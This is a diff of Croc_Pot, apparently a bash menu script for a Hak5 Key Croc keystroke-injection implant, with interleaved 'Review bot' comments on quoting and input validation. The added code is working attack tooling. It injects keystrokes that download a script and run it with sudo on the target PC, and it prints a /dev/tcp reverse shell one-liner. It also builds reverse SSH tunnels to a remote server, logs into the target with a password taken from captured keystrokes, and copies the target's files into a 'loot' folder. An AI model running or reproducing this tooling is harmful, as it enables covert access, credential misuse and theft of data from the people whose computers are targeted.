croc_isp=$(curl -Lsf --connect-timeout 2 --max-time 2 http://ip-api.com/line?fields=isp | awk '{print $1}') +check_device $(os_ip) TARGET PC +echo -ne "\e[38;5;19;4;1;48;5;245mPublic ip${clear}${yellow}:${clear}${green}$(curl -s --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com) ${clear}${yellow}COUNTRY:${clear}${green}${croc_country} ${clear}${yellow}CITY:${clear}${green}${croc_city}${clear}${yellow}/${clear}${green}${croc_region} ${clear}${yellow}ISP:${clear}${green}${croc_isp}${clear}\n" +ssid_check ; check_device croc KEY CROC_ | sed 's/--/'$croc_mac'/g' +default_ip 172.16.42.1 ; check_device mk7 WIFI PINEAPPLE7 +saved_mac /root/udisk/tools/Croc_Pot/squirrel_mac.txt 1p ; default_ip 172.16.32.1 ; check_device squirrel PACKET SQUIRREL +sed -i 's/--//g' /root/udisk/tools/Croc_Pot/turtle_mac.txt 2> /dev/null ; saved_mac /root/udisk/tools/Croc_Pot/turtle_mac.txt 2p ; turtle_check ; check_device turtle LAN TURTLE +saved_mac /root/udisk/tools/Croc_Pot/shark_ip.txt 2p ; shark_check ; check_device shark SHARK JACK +#screen_crab ; owl_check ; 
check_device ${IP_O} SIGNAL OWL_ ; check_device Pineapple.lan WIFI PINEAPPLET +bunny_mac ; check_device ${remote_vps} REMOTE VPS | sed 's/MAC://g' | sed 's/--//g' echo -ne "\e[48;5;202;30m${LINE}${clear}\n" ## #----SSH keycroc to target pc 
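Review bot: `ssid_check` splices the SSID read from `/root/udisk/config.txt` unquoted into a sed address (`sed -n '/'$(sed -n -e 's/^WIFI_SSID //p' ...)'/p'`), so an SSID containing a space, a `/` or a regex metacharacter breaks the sed program or selects the wrong scan line. Reading the value once and filtering with a fixed-string match is safer: `local ssid; ssid=$(sed -n -e 's/^WIFI_SSID //p' /root/udisk/config.txt)` followed by `... | grep -F -- "${ssid}"` in place of the final `sed -n`. Further down, the four `curl` calls to `http://ip-api.com/line?fields=...` pass an unquoted URL containing `?` and fetch over plain HTTP, and the result goes straight into `echo -ne`, which interprets backslash escapes. Quoting the URL and printing the returned text with `printf '%s'` would keep a tampered response from injecting terminal escapes. Those `local` assignments sit in an enclosing function whose start is outside this hunk.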
@@ -4406,117 +6212,152 @@ else fi } ## +#----SSH Reachable target on local network +## +reachable_target() { + local t_ip=$(route -n | grep "UG" | grep -v "UGH" | cut -f 10 -d " " | sed -r 's/.{1}$//') + for i in {1..254} ;do (ping -q -c 1 -w 1 $t_ip$i >/dev/null && echo "$t_ip$i" &) ;done + ip n | grep -i reach | sed -r 's/\b(dev|lladdr)\b//g' +} +## #----SSH enter user/ip to start ssh ## userinput_ssh() { - echo -ne "$(ColorBlue 'ENTER THE HOST/USER NAME FOR SSH AND PRESS [ENTER]:')"; read SSH_USER - echo -ne "$(ColorBlue 'ENTER THE IP FOR SSH AND PRESS [ENTER]:')"; read SSH_IP + read_all ENTER THE HOST/USER NAME FOR SSH AND PRESS [ENTER] ; SSH_USER=${r_a} + read_all ENTER THE IP FOR SSH AND PRESS [ENTER] ; SSH_IP=${r_a} ssh -o "StrictHostKeyChecking no" ${SSH_USER}@${SSH_IP} } ## -#----SSH to wifi pineapple +#----SSH wifi pineapple menu/function ## ssh_pineapple() { + echo -ne "$(Info_Screen ' +-Wi-Fi Pineapple Mk7 example/preset command')\n\n" +ping -q -c 1 -w 1 mk7 &>/dev/null 2>&1 +if [[ $? 
-ne 0 ]]; then + echo -ne "$(ColorRed 'Did not detect Wi-Fi Pineapple Mk7')\n" +elif [[ "${#args[@]}" -eq 0 ]]; then +## +#----SSH Wi-Fi Pineapple Mk7 kismet LED lights random/off/reset/custom +## +pineapple_led() { clear -ssh_shell() { - read_all ENTER WIFI PINEAPPLE IP FOR SSH AND PRESS [ENTER] - ip_check_ssh 172.16.42.1 + echo -ne "$(Info_Screen ' +-Wi-Fi Pineapple Mk7 Kismet LED example command +-Kismet LED Mod command--> LEDMK7 --help +-Reset color command--> LEDMK7 -r +-Trun LED off command--> LEDMK7 -0 0,0,0 -1 0,0,0 -2 0,0,0 -3 0,0,0 +-Each LED is set to a Hue color 0-360, Saturation 0-255, and brightness 0-255 +-More info at https://www.kismetwireless.net/mk7-led-mod')\n\n" +## +#----SSH Wi-Fi Pineapple Mk7 kismet led random light +## +kismet_ramdom() { + read_all RANDOM MK7 KISMET LED LIGHT Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + Countdown 1 15 & +for i in {1..10}; do ssh root@mk7 LEDMK7 -a $(( $RANDOM % 360 )),$(( $RANDOM % 255 )) -b $(( $RANDOM % 360 )),$(( $RANDOM % 255 )); sleep 5; ssh root@mk7 LEDMK7 -r; sleep 1; done + ssh root@mk7 LEDMK7 -r + Countdown 1 15 & +for i in {1..10}; do ssh root@mk7 LEDMK7 -p $(( $RANDOM % 360 )),$(( $RANDOM % 255 )),$(( $RANDOM % 255 )); sleep 5; ssh root@mk7 LEDMK7 -r; sleep 1; done + ssh root@mk7 LEDMK7 -r + Countdown 1 15 & +for i in {1..10}; do ssh root@mk7 LEDMK7 -0 $(( $RANDOM % 360 )),$(( $RANDOM % 255 )),$(( $RANDOM % 255 )) -1 $(( $RANDOM % 255 )),$(( $RANDOM % 255 )),$(( $RANDOM % 255 )) -2 $(( $RANDOM % 255 )),$(( $RANDOM % 255 )),$(( $RANDOM % 255 )) -3 $(( $RANDOM % 255 )),$(( $RANDOM % 255 )),$(( $RANDOM % 255 )); sleep 5; ssh root@mk7 LEDMK7 -r; sleep 1; done ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; pineapple_led ;; +esac } ## -#----SSH start wifi pineapple web UI +#----SSH Wi-Fi Pineapple Mk7 kismet LED lights custom ## -pine_web() { - echo -ne "\n$(ColorYellow 'Starting WIFI Pineapple web page')\n" -if [ "$(OS_CHECK)" = WINDOWS 
]; then - Q GUI d - Q GUI r - sleep 1 - Q STRING "powershell" - Q ENTER - sleep 2 - Q STRING "Start-Process http://172.16.42.1:1471; exit" - Q ENTER -else - case $HOST_CHECK in -raspberrypi) - Q GUI d - sleep 1 - Q STRING "LXTerminal" - Q ENTER - Q ENTER - sleep 1 - Q STRING "gio open http://172.16.42.1:1471; exit" - Q ENTER ;; -parrot) - Q ALT F2 - sleep 1 - Q STRING "mate-terminal" - Q ENTER - sleep 1 - Q STRING "gio open http://172.16.42.1:1471; exit" - Q ENTER ;; -*) - Q ALT F2 - sleep 1 - Q STRING "xterm" - Q ENTER - sleep 1 - Q STRING "gio open http://172.16.42.1:1471; exit" - Q ENTER ;; +kismet_custom() { + read_all ENTER FIRST COLOR CODE AND PRESS [ENTER] ; local first_color=${r_a} + read_all ENTER FIRST BRIGHTNESS CODE AND PRESS [ENTER] ; local first_bright=${r_a} + read_all ENTER SECOND COLOR CODE AND PRESS [ENTER] ; local second_color=${r_a} + read_all ENTER SECOND BRIGHTNESS CODE AND PRESS [ENTER] ; local first_bright=${r_a} + ssh root@mk7 LEDMK7 -a ${first_color},${first_bright} -b ${second_color},${first_bright} +} +## +#----SSH wifi pineapple kismet led mod menu +## +MenuTitle MK7 KISMET LED MOD MENU ; MenuColor 19 1 RANDOM LED ; MenuColor 19 2 RESTORE LED ; MenuColor 19 3 TRUN OFF LED ; MenuColor 19 4 CUSTOM LED +MenuColor 19 5 RETURN TO MAIN MENU ; MenuEnd 22 + case $m_a in + 1) kismet_ramdom ; pineapple_led ;; 2) ssh root@mk7 LEDMK7 -r ; pineapple_led ;; 3) ssh root@mk7 LEDMK7 -0 0,0,0 -1 0,0,0 -2 0,0,0 -3 0,0,0 ; pineapple_led ;; + 4) kismet_custom ; pineapple_led ;; 5) main_menu ;; 0) exit 0 ;; [bB]) ssh_pineapple ;; + *) invalid_entry ; ssh root@mk7 LEDMK7 -0 0,0,0 -1 0,0,0 -2 0,0,0 -3 0,0,0 ; pineapple_led ;; esac -fi } ## #----SSH wifi pineapple menu ## -MenuTitle WIFI PINEAPPLE MENU -MenuColor 1 SSH PINEAPPLE ; echo -ne " ${clear}\n" -MenuColor 2 PINEAPPLE WEB ; echo -ne " ${clear}\n" -MenuColor 3 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle WIFI PINEAPPLE MENU ; MenuColor 19 1 SSH PINEAPPLE ; MenuColor 19 2 PINEAPPLE WEB 
; MenuColor 19 3 MK7 LED MOD MENU ; MenuColor 19 4 MK7 STATUS/INFO +MenuColor 19 5 MK7 TCPDUMP ; MenuColor 19 6 ENTER COMMAND ; MenuColor 19 7 RETURN TO MAIN MENU ; MenuEnd 22 case $m_a in - 1) ssh_shell ; ssh_menu ;; - 2) pine_web ; ssh_menu ;; - 3) main_menu ;; + 1) ip_check_ssh mk7 172.16.42.1 ; ssh_menu ;; + 2) start_web http://172.16.42.1:1471 ; ssh_menu ;; + 3) pineapple_led ;; + 4) ssh root@mk7 'uname -a ; uptime' ; echo ${LINE} ; ssh root@mk7 ifconfig ; echo ${LINE} ; ssh root@mk7 netstat -tunlp ; echo ${LINE} ; ssh root@mk7 ps -aux ; echo ${LINE} + ssh root@mk7 iw dev wlan1 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort ; sleep 2 ; echo ${LINE} + ssh root@mk7 nmap -Pn -sS -T 3 172.16.42.1/24 ; echo ${LINE} ; ssh_pineapple ;; + 5) ssh root@mk7 tcpdump -XX -i any ; ssh_pineapple ;; + 6) read_all ENTER COMMAND AND PRESS [ENTER] ; local USER_COMMAND=${r_a} + ssh root@mk7 ''${USER_COMMAND}'' ; sleep 5 ; ssh_pineapple ;; + 7) main_menu ;; 0) exit 0 ;; [bB]) ssh_menu ;; - *) invalid_entry ; ssh_menu ;; + *) invalid_entry ; ssh_pineapple ;; esac +fi } ## #----SSH to packet squirrel ## ssh_squirrel() { - read_all ENTER PACKET SQUIRREL IP FOR SSH AND PRESS [ENTER] - ip_check_ssh 172.16.32.1 + ip_check_ssh squirrel 172.16.32.1 } ## #----SSH to lan turtle ## ssh_turtle() { - read_all ENTER LAN TURTLE IP FOR SSH AND PRESS [ENTER] - ip_check_ssh 172.16.84.1 + local TURTLE_IP=/root/udisk/tools/Croc_Pot/turtle_mac.txt +if [ -e ${TURTLE_IP} ]; then + if [[ "$(sed -n '1p' ${TURTLE_IP})" =~ ${validate_ip} ]]; then + ip_check_ssh $(sed -n '1p' ${TURTLE_IP}) turtle +else + ip_check_ssh turtle 172.16.84.1 + fi +fi 2> /dev/null } ## #----SSH to signal owl ## ssh_owl() { - read_all ENTER SIGNAL OWL IP FOR SSH AND PRESS [ENTER] - ip_check_ssh ${IP_O} + ip_check_ssh ${IP_O} 172.16.56.1 } ## #----SSH to shark jack ## ssh_shark() { - read_all ENTER SHARK JACK IP FOR SSH AND PRESS [ENTER] - ip_check_ssh 
${IP_F} + local SHARK_IP=/root/udisk/tools/Croc_Pot/shark_ip.txt +if [ -e ${SHARK_IP} ]; then + if [[ "$(sed -n '1p' ${SHARK_IP})" =~ ${validate_ip} ]]; then + ip_check_ssh $(sed -n '1p' ${SHARK_IP}) shark +else + ip_check_ssh shark 172.16.24.1 + fi +fi 2> /dev/null } ## #----SSH to bash bunny ## ssh_bunny() { clear - echo -ne "$(Info_Screen '-Start ssh with Target PC to Bash bunny or + echo -ne "$(Info_Screen ' +-Start ssh with Target PC to Bash bunny or -Start REVERSE SHELL Tunnel with keycroc to bash bunny -Will need a small payload install on bash bunny -This will create the payload for the bash bunny and save it to tools folder 
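Review bot: `kismet_custom` stores the fourth prompt in `first_bright` a second time, so the first brightness value is overwritten and both `-a` and `-b` receive the same brightness. The last read should be `local second_bright=${r_a}` and the command `ssh root@mk7 LEDMK7 -a ${first_color},${first_bright} -b ${second_color},${second_bright}`. The four values are also sent unvalidated; checking each against `^[0-9]+$` before the ssh call would keep stray input out of the remote command line. In menu entry 6 of `ssh_pineapple` the `''${USER_COMMAND}''` form only concatenates two empty strings around an unquoted expansion, so the typed command is word-split and glob-expanded locally before ssh sees it; `"${USER_COMMAND}"` passes it through intact.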
@@ -4528,6 +6369,109 @@ reverse shell tunnel From bunny to keycroc local bunny_payload=/root/udisk/tools/Croc_Pot/Bunny_Payload_Shell local bunny_payload_v=/root/udisk/tools/Croc_Pot/Bunny_Payload_Shell/payload.txt ## +#----Connect bunny to target pc network linux only +## +if [ "$(OS_CHECK)" = LINUX ]; then + read_all CONNECT BUNNY TO TARGET PC NETWORK Y/N AND PRESS [ENTER] + case $r_a in +[yY] | [yY][eE][sS]) + case $HOST_CHECK in + raspberrypi) + Q GUI d + sleep 1 + Q STRING "LXTerminal" + Q ENTER + Q ENTER + sleep 1 + Q STRING "i=\$(whoami)" + Q ENTER + Q STRING "if [ -e /home/\${i}/bb.sh ]; then" + Q ENTER + Q STRING "echo \"bb.sh is installed\"" + Q ENTER + Q STRING "else" + Q ENTER + Q STRING "echo \"installing bb.sh\"" + Q ENTER + Q STRING "wget bashbunny.com/bb.sh" + Q ENTER + Q STRING "fi" + Q ENTER + sleep 2 + Q STRING "sudo bash ./bb.sh" + Q ENTER + sleep 3 + Q STRING "c" + sleep 2 + Q STRING "exit" + Q ENTER + Q ALT-TAB ;; + parrot) + Q ALT F2 + sleep 1 + Q STRING "mate-terminal" + Q ENTER + sleep 1 + Q STRING "i=\$(whoami)" + Q ENTER + Q STRING "if [ -e /home/\${i}/bb.sh ]; then" + Q ENTER + Q STRING "echo \"bb.sh is installed\"" + Q ENTER + Q STRING "else" + Q ENTER + Q STRING "echo \"installing bb.sh\"" + Q ENTER + Q STRING "wget bashbunny.com/bb.sh" + Q ENTER + Q STRING "fi" + Q ENTER + sleep 2 + Q STRING "sudo bash ./bb.sh" + Q ENTER + sleep 3 + Q STRING "c" + sleep 2 + Q STRING "exit" + Q ENTER + Q ALT-TAB ;; + *) + Q ALT F2 + sleep 1 + Q STRING "xterm" + Q ENTER + sleep 1 + Q STRING "i=\$(whoami)" + Q ENTER + Q STRING "if [ -e /home/\${i}/bb.sh ]; then" + Q ENTER + Q STRING "echo \"bb.sh is installed\"" + Q ENTER + Q STRING "else" + Q ENTER + Q STRING "echo \"installing bb.sh\"" + Q ENTER + Q STRING "wget bashbunny.com/bb.sh" + Q ENTER + Q STRING "fi" + Q ENTER + sleep 2 + Q STRING "sudo bash ./bb.sh" + Q ENTER + sleep 3 + Q STRING "c" + sleep 2 + Q STRING "exit" + Q ENTER + Q ALT-TAB ;; + esac ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 
'Maybe next time')\n" ;; +*) + invalid_entry ; ssh_bunny ;; + esac +fi +## #----bunny create reverse shell payload for keycroc ## if [ -d "${bunny_payload}" ]; then @@ -4601,14 +6545,15 @@ esac fi ;; [nN] | [nN][oO]) echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; -*) invalid_entry ; ssh_bunny ;; +*) + invalid_entry ; ssh_bunny ;; esac ## #----bunny start reverse shell bunny to keycroc ## read_all START REVERSE TUNNEL WITH BUNNY TO CROC Y/N AND PRESS [ENTER] case $r_a in - [yY] | [yY][eE][sS]) +[yY] | [yY][eE][sS]) if [ "$(OS_CHECK)" = WINDOWS ]; then LED ATTACK ssh -o "StrictHostKeyChecking no" root@localhost -p 7000 @@ -4616,10 +6561,10 @@ elif [ "$(OS_CHECK)" = LINUX ]; then LED ATTACK ssh -o "StrictHostKeyChecking no" root@localhost -p 7000 fi ;; - [nN] | [nN][oO]) - echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; - *) - invalid_entry ; ssh_bunny ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; ssh_bunny ;; esac } ## @@ -4627,7 +6572,8 @@ esac ## ssh_keygen() { clear - echo -ne "$(Info_Screen '-Create public/private keys using ssh-key-gen on local-host + echo -ne "$(Info_Screen ' +-Create public/private keys using ssh-key-gen on local-host -Generate keys on the keycroc and send to remote-host -This will run ssh-keygen and copy to remote-host -ssh-copy-id -i ~/.ssh/id_rsa.pub username@remote-host-ip 
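Review bot: The typed `wget bashbunny.com/bb.sh` has no scheme, so the download starts over plain HTTP, and the next typed line runs the result with `sudo bash ./bb.sh` without any integrity check. Typing `wget https://bashbunny.com/bb.sh` (assuming the host serves it over TLS) and comparing the file against a known checksum before the sudo step would close that gap. The existence test looks at `/home/${i}/bb.sh` while the script is saved to and run from the terminal's current directory, which only agree when the terminal opens in that home directory. The same block is repeated for `raspberrypi`, `parrot` and `*`, differing only in how the terminal is opened; a shared helper called after the terminal launch would keep the three arms in sync. The enclosing `ssh_bunny` starts and ends outside this hunk.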
@@ -4657,31 +6603,34 @@ esac ## croc_reverse_shell() { clear - echo -ne "$(Info_Screen '# 1 Start reverse shell with nc start listening on remote-server first + echo -ne "$(Info_Screen ' +# 1 Start reverse shell with nc start listening on remote-server first # 2 Start listening on the keycroc # 3 Create payload to start reverse shell KeyCroc to remote-server # 4 Start reverse ssh tunnel target pc to KeyCroc # 5 Start reverse ssh tunnel Keycroc to remote-server -# 6 Send remote commands with ssh')\n\n" +# 6 Send remote commands with ssh +# 7 Send remote files with SCP')\n\n" shell_input() { unset IP_RS IP_RSP IP_RSN rm /root/udisk/tools/Croc_Pot/saved_shell.txt 2> /dev/null - echo -ne "$(ColorBlue 'ENTER IP OF SERVER/REMOTE-HOST PRESS [ENTER]:')"; read IP_RS ; echo "${IP_RS}" >> /root/udisk/tools/Croc_Pot/saved_shell.txt - echo -ne "$(ColorBlue 'ENTER PORT NUMBER TO USE PRESS [ENTER]:')"; read IP_RSP ; echo "${IP_RSP}" >> /root/udisk/tools/Croc_Pot/saved_shell.txt - echo -ne "$(ColorBlue 'ENTER SERVER/REMOTE-HOST NAME PRESS [ENTER]:')"; read IP_RSN ; echo "${IP_RSN}" >> /root/udisk/tools/Croc_Pot/saved_shell.txt + read_all ENTER IP OF SERVER/REMOTE-HOST PRESS [ENTER] ; IP_RS=${r_a} ; echo "${IP_RS}" >> /root/udisk/tools/Croc_Pot/saved_shell.txt + read_all ENTER PORT NUMBER TO USE PRESS [ENTER] ; IP_RSP=${r_a} ; echo "${IP_RSP}" >> /root/udisk/tools/Croc_Pot/saved_shell.txt + read_all ENTER SERVER/REMOTE-HOST NAME PRESS [ENTER] ; IP_RSN=${r_a} ; echo "${IP_RSN}" >> /root/udisk/tools/Croc_Pot/saved_shell.txt } ## #----SSH reverse with netcat remote listener on (server) ## remote_listener() { clear - echo -ne "$(Info_Screen '-Start a reverse shell with netcat on keycroc + echo -ne "$(Info_Screen ' +-Start a reverse shell with netcat on keycroc -Remotely access keycroc from a remote-server -Frist On the listening remote-server enter this below --\e[40;32mnc -lnvp PORT# -s IP OF LISTENING REMOTE-SERVER\e[0m\e[40;93m +-->nc -lnvp PORT# -s IP OF LISTENING REMOTE-SERVER -On 
Keycroc Enter ip of the listening remote-server and port number -Keycroc side will be setup as below --\e[40;32m/bin/bash -i >& /dev/tcp/remote-server-ip/port#')${clear}\n\n" +-->/bin/bash -i >& /dev/tcp/remote-server-ip/port#')\n" read_all START REVERSE SHELL Y/N AND PRESS [ENTER] case $r_a in [yY] | [yY][eE][sS]) @@ -4713,11 +6662,12 @@ fi ;; esac } ## -#----SSH croc as listener +#----SSH keycroc as listener ## croc_listener() { clear - echo -ne "$(Info_Screen '-Start Listening on keycroc + echo -ne "$(Info_Screen ' +-Start Listening on keycroc -Access on remote PC,server -This will start listening on the keycroc -Enter this below on remote-server/host side @@ -4735,16 +6685,17 @@ case $r_a in esac } ## -#----SSH reverse ssh tunnel croc (payload) +#----SSH reverse ssh tunnel keycroc (payload) ## reverse_payload() { clear - echo -ne "$(Info_Screen '-Create Reverse SSH Tunnel Payload keycroc to remote-server + echo -ne "$(Info_Screen ' +-Create Reverse SSH Tunnel Payload keycroc to remote-server -Plug keycroc into Target pc and type in croctunnel -Keycroc side will be setup as below --\e[40;32mssh -fN -R port#:localhost:22 username@your-server-ip\e[0m\e[40;93m +-->ssh -fN -R port#:localhost:22 username@your-server-ip -Enter on remote-server side as below --\e[40;32mssh root@localhost -p port#')${clear}\n\n" +-->ssh root@localhost -p port#')\n" local PAYLOAD_SHELL=/root/udisk/payloads/Croc_Shell.txt if [ -e "${PAYLOAD_SHELL}" ]; then echo -ne "\n$(ColorGreen 'Croc_Shell already exists')\n" 
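Review bot: `shell_input` appends whatever was typed for the server IP and port straight to `saved_shell.txt`, and the script later reads that file back into an unquoted argument (`check_device ${remote_vps}`). Since this commit introduces `validate_ip`, the address could be checked before it is saved, e.g. `[[ "${IP_RS}" =~ ${validate_ip} ]] || { invalid_entry ; return ; }`, with a matching `[[ "${IP_RSP}" =~ ^[0-9]+$ ]]` test for the port. If host names are meant to be accepted at that prompt as well, the check would need to allow them.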
@@ -4779,11 +6730,12 @@ fi ## shell_pc() { clear - echo -ne "$(Info_Screen '-Start reverse ssh tunnel Target PC to Keycroc + echo -ne "$(Info_Screen ' +-Start reverse ssh tunnel Target PC to Keycroc -PC side will be setup with this below --\e[40;32mssh -fN -R port#:localhost:22 root@keycroc IP\e[0m\e[40;93m +-->ssh -fN -R port#:localhost:22 root@keycroc IP -Keycroc side will be setup with this below --\e[40;32mssh PC-username@localhost -p port#\e[0m')\n\n" +-->ssh PC-username@localhost -p port#')\n" echo -ne "$(ColorYellow 'Found save Passwd try this:') $(target_pw)\n" start_shell() { if [ -e "/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered" ]; then @@ -4870,10 +6822,10 @@ parrot) start_shell ;; esac fi ;; - [nN] | [nN][oO]) - echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; - *) - invalid_entry ; shell_pc ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; shell_pc ;; esac else echo -ne "\t$(ColorYellow 'PLEASE RUN CROC_POT_PAYLOAD.TXT TO GET TARGET IP/USERNAME')\n" @@ -4884,7 +6836,8 @@ fi ## ssh_tunnel() { clear - echo -ne "$(Info_Screen '-Start a Reverse SSH Tunnel Keycroc to remote-server + echo -ne "$(Info_Screen ' +-Start a Reverse SSH Tunnel Keycroc to remote-server -Remotely access keycroc from a remote-server VPS -Keycroc will be setup with these setting below -\e[40;32mssh -fN -R port#:localhost:22 root@remote-server-ip\e[0m\e[40;93m 
@@ -4924,60 +6877,166 @@ fi ;; esac } ## +#----SSH Copy a Local File to a Remote System with the scp Command +## +remote_file() { + local TARGET_USERNAME=$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt) + clear + echo -ne "$(Info_Screen ' +-Copy a Local File to a Remote System with the scp Command +-Example +-scp path/to/local/file.ext remote_username@remote_IP:path/to/remote/file.ext +-Copy a Remote File to a Local System using the scp Command +-Example +-scp remote_username@remote_IP:path/to/remote/file.ext path/to/local/file.ext')\n\n" +## +#----SSH send Remote File keycroc to target pc +## +keycroc_target() { + clear + echo -ne "$(Info_Screen ' +-Send file from keycroc to target pc +-Save to target pc home')\n\n" + cd / ; for i in `ls -d */` ; do g=`find ./$i -type f -print | wc -l` ; echo "Directory $i contains $g files."; done + read_all ENTER THE FOLDER NAME TO VEIW FILES ; local r_f=${r_a} + find /${r_f} -type f -name "*.*" + read_all ENTER THE FULL PATH OF FILE TO SEND + if [ -e "${r_a}" ]; then + sshpass -p $(target_pw) scp -o "StrictHostKeyChecking no" ${r_a} ${TARGET_USERNAME}@$(os_ip):~/ + else + echo -ne "${red}File does not exist${clear}\n" ; invalid_entry + fi +} +## +#----SSH Receive Remote File target pc to keycroc +## +target_keycroc() { + clear + echo -ne "$(Info_Screen ' +-Receive file from target pc to keycroc +-Save to keycroc loot/Croc_Pot +-Will need to know the path of file on target pc')\n\n" + sshpass -p $(target_pw) ssh -o "StrictHostKeyChecking no" ${TARGET_USERNAME}@$(os_ip) 'cd / ; for i in `ls -d */` ; do g=`sudo find ./$i -type f -print | wc -l` ; echo "Directory $i contains $g files."; done' + read_all ENTER THE FOLDER NAME TO VEIW FILES ; local r_f=${r_a} + sshpass -p $(target_pw) ssh ${TARGET_USERNAME}@$(os_ip) 'find /'${r_f}' -type f -name "*.*"' + read_all ENTER THE FULL PATH OF FILE TO RECEIVE + sshpass -p $(target_pw) ssh ${TARGET_USERNAME}@$(os_ip) 'test -e '${r_a}'' + if [ $? 
-eq 0 ]; then + sshpass -p $(target_pw) scp ${TARGET_USERNAME}@$(os_ip):${r_a} /root/udisk/loot/Croc_Pot + else + echo -ne "${red}File does not exist${clear}\n" ; invalid_entry + fi +} +## +#----SSH send Remote File by enter target credentials host_name/host_ip +## +user_file() { + clear + echo -ne "$(Info_Screen ' +-Send file from keycroc to remote host +-Save to remote host home')\n\n" +read_all ENTER REMOTE HOST IP ; local r_h=${r_a} +if [[ ${r_h} =~ ${validate_ip} ]]; then +ping -q -c 1 -w 1 ${r_h} &>/dev/null 2>&1 + if [[ $? -ne 0 ]]; then + echo -ne "${red}Unable to reach host${clear}\n" + elif [[ "${#args[@]}" -eq 0 ]]; then + cd / ; for i in `ls -d */` ; do g=`find ./$i -type f -print | wc -l` ; echo "Directory $i contains $g files."; done + read_all ENTER THE FOLDER NAME TO VEIW FILES ; local r_f=${r_a} + find /${r_f} -type f -name "*.*" + read_all ENTER THE FULL PATH OF FILE TO SEND ; local c_f=${r_a} + if [ -e "${c_f}" ]; then + read_all ENTER REMOTE HOST_NAME ; local r_n=${r_a} + scp -o "StrictHostKeyChecking no" ${c_f} ${r_n}@${r_h}:~/ + else + echo -ne "${red}File does not exist${clear}\n" ; invalid_entry + fi + fi +else + echo -ne "${red}Not a valid ip address${clear}\n" ; invalid_entry +fi +} +## +#----SSH Receive Remote File from remote target/host +## +remote_host() { + clear + echo -ne "$(Info_Screen ' +-Receive file from remote host to keycroc +-Save to keycroc loot/Croc_Pot +-Will need to know the path of file on remote host')\n\n" + read_all ENTER REMOTE HOST IP ; local r_h=${r_a} +if [[ ${r_h} =~ ${validate_ip} ]]; then +ping -q -c 1 -w 1 ${r_h} &>/dev/null 2>&1 + if [[ $? 
-ne 0 ]]; then + echo -ne "${red}Unable to reach host${clear}\n" + elif [[ "${#args[@]}" -eq 0 ]]; then + read_all ENTER REMOTE HOST_NAME ; local r_n=${r_a} + ssh -o "StrictHostKeyChecking no" ${r_n}@${r_h} 'cd / ; for i in `ls -d */` ; do g=`sudo find ./$i -type f -print | wc -l` ; echo "Directory $i contains $g files."; done' + read_all ENTER THE FOLDER NAME TO VEIW FILES ; local r_f=${r_a} + ssh ${r_n}@${r_h} 'find /'${r_f}' -type f -name "*.*"' + read_all ENTER THE FULL PATH OF FILE TO RECEIVE + ssh ${r_n}@${r_h} 'test -e '${r_a}'' + if [ $? -eq 0 ]; then + scp ${r_n}@${r_h}:${r_a} /root/udisk/loot/Croc_Pot + else + echo -ne "${red}File does not exist${clear}\n" ; invalid_entry + fi + fi +else + echo -ne "${red}Not a valid ip address${clear}\n" ; invalid_entry +fi +} +## +#----SSH Remote File with scp Command menu +## +MenuTitle REMOTE FILE MENU ; MenuColor 21 1 KEYCROC TO TARGET PC ; MenuColor 21 2 TARGET PC TO KEYCROC ; MenuColor 21 3 SEND TO REMOTE HOST ; MenuColor 21 4 RECEIVE REMOTE HOST ; MenuColor 21 5 RETURN TO MAIN MENU ; MenuEnd 24 + case $m_a in + 1) keycroc_target ; remote_file ;; 2) target_keycroc ; remote_file ;; 3) user_file ; remote_file ;; 4) remote_host ; remote_file ;; 5) main_menu ;; 0) exit 0 ;; [bB]) croc_reverse_shell ;; *) invalid_entry ; remote_file ;; + esac +} +## #----SSH Execute a remote command on a host over SSH ## remote_command() { clear - echo -ne "$(Info_Screen '-Execute a remote command on a host over SSH + echo -ne "$(Info_Screen ' +-Execute a remote command on a host over SSH -Example ssh root@192.168.1.1 uptime -ssh USER@HOST COMMAND1; COMMAND2; COMMAND3 or -ssh USER@HOST COMMAND1 | COMMAND2 | COMMAND3 -SSH between remote hosts and get back the output')\n\n" target_command() { - echo -ne "$(ColorBlue 'ENTER COMMAND AND PRESS [ENTER]'): "; read USER_COMMAND - ssh ${1}@${@:2} ${USER_COMMAND} + read_all ENTER COMMAND AND PRESS [ENTER] ; local USER_COMMAND=${r_a} + ssh -o "StrictHostKeyChecking no" ${1}@${@:2} 
''${USER_COMMAND}'' sleep 5 } input_command() { - echo -ne "$(ColorBlue 'ENTER TARGET USRNAME AND PRESS [ENTER]'): "; read USERNAME_COMMAND - echo -ne "$(ColorBlue 'ENTER TARGET IP AND PRESS [ENTER]'): "; read IP_COMMAND - echo -ne "$(ColorBlue 'ENTER COMMAND AND PRESS [ENTER]'): "; read USER_COMMAND - ssh ${USERNAME_COMMAND}@${IP_COMMAND} ${USER_COMMAND} + read_all ENTER TARGET USERNAME AND PRESS [ENTER] ; local USERNAME_COMMAND=${r_a} + read_all ENTER TARGET IP AND PRESS [ENTER] ; local IP_COMMAND=${r_a} + read_all ENTER COMMAND AND PRESS [ENTER] ; local USER_COMMAND=${r_a} + ssh -o "StrictHostKeyChecking no" ${USERNAME_COMMAND}@${IP_COMMAND} ''${USER_COMMAND}'' sleep 5 } pc_target_command() { - echo -ne "$(ColorBlue 'ENTER COMMAND AND PRESS [ENTER]'): "; read USER_COMMAND + read_all ENTER COMMAND AND PRESS [ENTER] ; local USER_COMMAND=${r_a} if [ -e "/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered" ]; then - sshpass -p $(target_pw) ssh -o "StrictHostKeyChecking no" $(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt)@$(os_ip) ${USER_COMMAND} + 